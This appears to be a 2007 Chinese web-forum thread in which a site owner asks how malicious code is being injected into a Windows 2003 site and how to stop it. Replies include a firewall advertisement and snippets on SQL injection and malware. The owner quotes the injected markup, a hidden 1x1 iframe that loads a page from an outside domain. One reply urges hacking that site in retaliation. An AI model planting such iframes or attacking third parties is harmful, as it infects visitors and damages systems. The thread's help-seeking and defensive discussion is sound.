网站原代码经常被注入恶意代码，请问如何有效解决这个问题？

zjsxlitc 2007-09-13 09:19:46

网站源文件的末尾老是被注入恶意代码，比如
<iframe src=http://xxx.18dmm.com/newdm/new09.htm?027 width=1 height=1></iframe>

导致浏览的时候，或被提示有病毒，或打开速度变慢。
服务器系统为WIN2003，已打了所有补丁，并且安装有SP2，同时装了防火墙，杀毒软件，开启了360安全卫士的防护功能。
请问恶意代码是通过何种方式被注入的？如何有效防止这样的情况再次发生？

...全文

144 3 打赏收藏转发到动态举报

写回复

3 条回复

切换为时间正序

请发表友善的回复…

发表回复

yjukh 2007-10-10

打赏
举报

回复

我自己做了个服务器，本没有对我开放，可后来发现竟然自己生成了一个alert.txt文件，
里面说：
There are some secure problems in you system .please fix it
ZwelL

后来查了一下这个作者本来是善意的，是一个自动搜索程序，但也有可能被一些不法分子利用～～

skming美女相册 2007-10-10

打赏
举报

回复

最好能把.XXX.18DMM.这个网站先黑了再说.

netbor 2007-10-10

打赏
举报

回复

提高代码的质量。

关于软件： “Safe3 Web Application Firewall"是国内知名安全组织保护伞网络基于新一代Web安全技术开发的全方位企业Web信息安全产品。不仅能有效扫描各种WebShell，而且可以抵御各种Web攻击。运行环境：该软件能运行在 Windows 2000/2003/2008 下，支持 IIS5/IIS6/IIS7.0 软件主要功能：流量控制:当前网络P2P软件泛滥成灾，多线程下载（如迅雷等）造成网站仅有的带宽资源严重枯竭，不仅影响了网站的正常浏览，还得为额外的流量支付大批费用。Safe3 Web Application Firewall能有效解决多线程下载带来的流量损失，帮助站长赢得网络先机。 SQL注入:如今各种SQL注入工具充斥着Internet，更甚者自动化蠕虫的Mass SQL Injection 一天就可以给成千上万的网站挂马，严重的损害了企业形象和数据安全。Safe3 Web Application Firewall采用注入模拟技术，有效拦截各种变种注入，帮助企业在互联网中力挽狂澜，博得生存空间。 CC攻击:在互联网竞争日益激烈的今天，不正当的竞争关系造成一方对另一方网站进行严重的CC攻击，随之而来的是网站瘫痪和访问量急剧下降。Safe3 Web Application Firewall能强力阻止因CC造成的DDOS攻击，彻底解决非法的不正当的竞争关系。资源盗链:当今网站间相互复制资源（图片和下载链接）已习以为常，不仅浪费带宽资源，而且也是一种侵权行为。Safe3 Web Application Firewall可以对网站资源进行高度保护，防止盗链，保障原创网站的合法权益。 XSS跨站:OWASP将XSS列为2007年WEB安全威胁第一位。黑客往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的。IIS Firewall可以有效检测包含XSS的恶意URL并拦截。影音保护:只允许影音在线播放而不能直接下载，有力的保护了视频网站的带宽资源和服务质量。网站监控:实时监控Web目录的变化情况并报警，强力阻止网页被篡改。 Web杀毒:通过分析可以扫描出99%的隐藏WebShell，保障web安全。文件篡改检查:提取重要文件的特征，当网页代码被修改后可迅速从大量代码文件中找出隐藏的后门或木马的页面。挂马清除助手:网上批量挂马的程序随处可见，给管理员手工清除造成了很大的困难，此功能可轻松解决管理员的困境。 Arp免疫:防止ARP挂马和敏感信息被监听截获。当黑客入侵同一网段的主机后如果你的主机没做任何ARP防御措施，虽然你的主机没被黑但客户访问你的网站时网页被插入恶意代码即ARP挂马。同时黑客可以嗅探到此网段下所以主机的ftp、http等用户密码。著名黑客网站安全焦点就曾遭到这样的攻击。虽然基本解决了arp对本地的威胁。但是arp还可以欺骗网关，会造成本地通讯中断，所以希望有条件的朋友最好在网关上绑定本地ip和mac地址。软件特点：防火墙采用C语言编写，运行效率极高。在每秒 100兆比特数据传输的大型服务器上运行良好，占用 CPU 极少。超强安全防护：彻底防 SQL 注入攻击等攻击。彻底防迅雷、FlashGet等。无需重启 IIS，配置数据即刻生效。汇集保护伞网络多年安全经验，强大可靠。安装容易，配置简单，丰富的帮助文档指导安装，专门的配置工具实现轻松配置。

如何解决网站建设中的网站被SQL注入的问题？

借鉴论文 - 恶意代码原理剖析 1.渗透技术渗透技术的任务是***保证恶意代码能够植入到目标主机中***，可以通过如下方式：感染可执行程序、分区表和数据文件(如：宏通过移动介质；通过人、社会工程方式；借助于系统和软件漏洞；通过电子邮件、Web网站和网页、P2P文件共享、即时通信工具和ARP欺骗方式等。 2.自启动技术自启动技术的任务是***保证恶意代码在受害主机下一次开机启动后也被激活**...

老听说有人的网站被恶意镜像，于是我先收藏几种解决方法。镜像站看似一个完整的站点，其实每次用户访问镜像站点，他的小偷程序就会来正版的网站查询数据，并修改相关链接然后呈献给用户。实质上还是在读取原站的数据，我们只需要屏蔽到抓取我们数据的那个主机ip就可以了。方法一：.htaccess文件禁ip1、获取镜像服务器ip复制如下代码，新建一个php文件，并命名为“ip.php”上传到你的网站根目录$file...

1、SQL注入攻击是黑客利用SQL注入漏洞对数据库进行攻击的常用手段之一。攻击者通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中，网站应用程序未经过滤，便将恶意SQL语句带入数据库执行。2、SQL注入漏洞可能会造成服务器的数据库信息泄露、数据被窃取、网页被篡改，甚至可能会造成网站被挂马、服务器被远程控制、被安装后门等。3、SQL注入的分类较多，一般可笼统地分为数字型注入与字符串型注入两类；当然，也可以更加详细地分为联合查找型注入、报错注入、时间盲注、布尔盲注等。

6,849

社区成员

178,034

社区内容

发帖

与我相关

我的任务

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章